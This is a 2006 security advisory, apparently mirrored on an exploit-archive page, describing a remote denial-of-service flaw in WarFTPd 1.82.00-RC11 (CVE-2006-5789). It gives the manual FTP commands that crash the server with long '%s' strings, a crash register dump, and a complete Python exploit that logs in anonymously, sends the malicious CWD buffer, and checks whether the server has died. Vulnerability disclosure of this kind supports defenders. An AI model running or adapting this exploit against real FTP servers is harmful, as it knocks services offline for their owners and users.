WarFTPd 1.82.00-RC11 Remote Denial Of Service

2006.11.09
Credit: Joxean Koret (joxeankoret yahoo es)
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-5789
CWE: CWE-399


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

WarFTPd 1.82.00-RC11 Remote Denial Of Service --------------------------------------------- WarFTPd is vulnerable to a DOS condition when passing to various commands a long string with two times the "%s" character(s) inside. It looks as non exploitable as the problem crashes with the same output at the same instruction and address regarding or regardless of the buffer size and the %${char} passed. Maybe another one founds it vulnerable. Example: $ ftp target (Banner) ftp> quote user anonymous ftp> quote pass bla ftp> cwd %s*256 or ftp> cdup %s*256 Server will crash as follows: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)" ESI 0079E7DE EDI 0000000A EIP 00431540 war-ftpd.00431540 00431540 8A08 MOV CL,BYTE PTR DS:[EAX] Only one shoot is needed. Any file related operation will crash. It was found during an ftp fuzzing session. The following commands found vulnerables (at least): CWD CDUP DELE NLST LIST SIZE Well, any file related operation. Attached goes a Python exploit. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. ------------------------------------------------------------------------ --- Contact ------- Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y mviles desde 1 cntimo por minuto. http://es.voice.yahoo.com#!/usr/bin/env python import sys import ftplib print "WAR_FTPD Remote Denial Of Service (DOS)" print "Copyright (c) Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP() print "[+] Connecting to target " msg = ftp.connect(target, targetPort) print "[+] Ok. Target banner" print msg print print "[+] Trying to logging anonymously" msg = ftp.login() # Anonymous print "[+] Ok. Message" print msg print except: print "[!] Exploit doesn't work. " + str(sys.exc_info()[1]) sys.exit(0) a = "%s%s" """ for i in range(0): a += a """ b = "AAAA" for i in range(6): b += b a = a + b print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... " try: ftp.cwd(a) except: print "[+] Exploit apparently works. Trying to verify it ... " try: ftp.connect(target, targetPort) print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :(" except: print "[!] Ok. Server is dead, exploit successfully executed. "


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top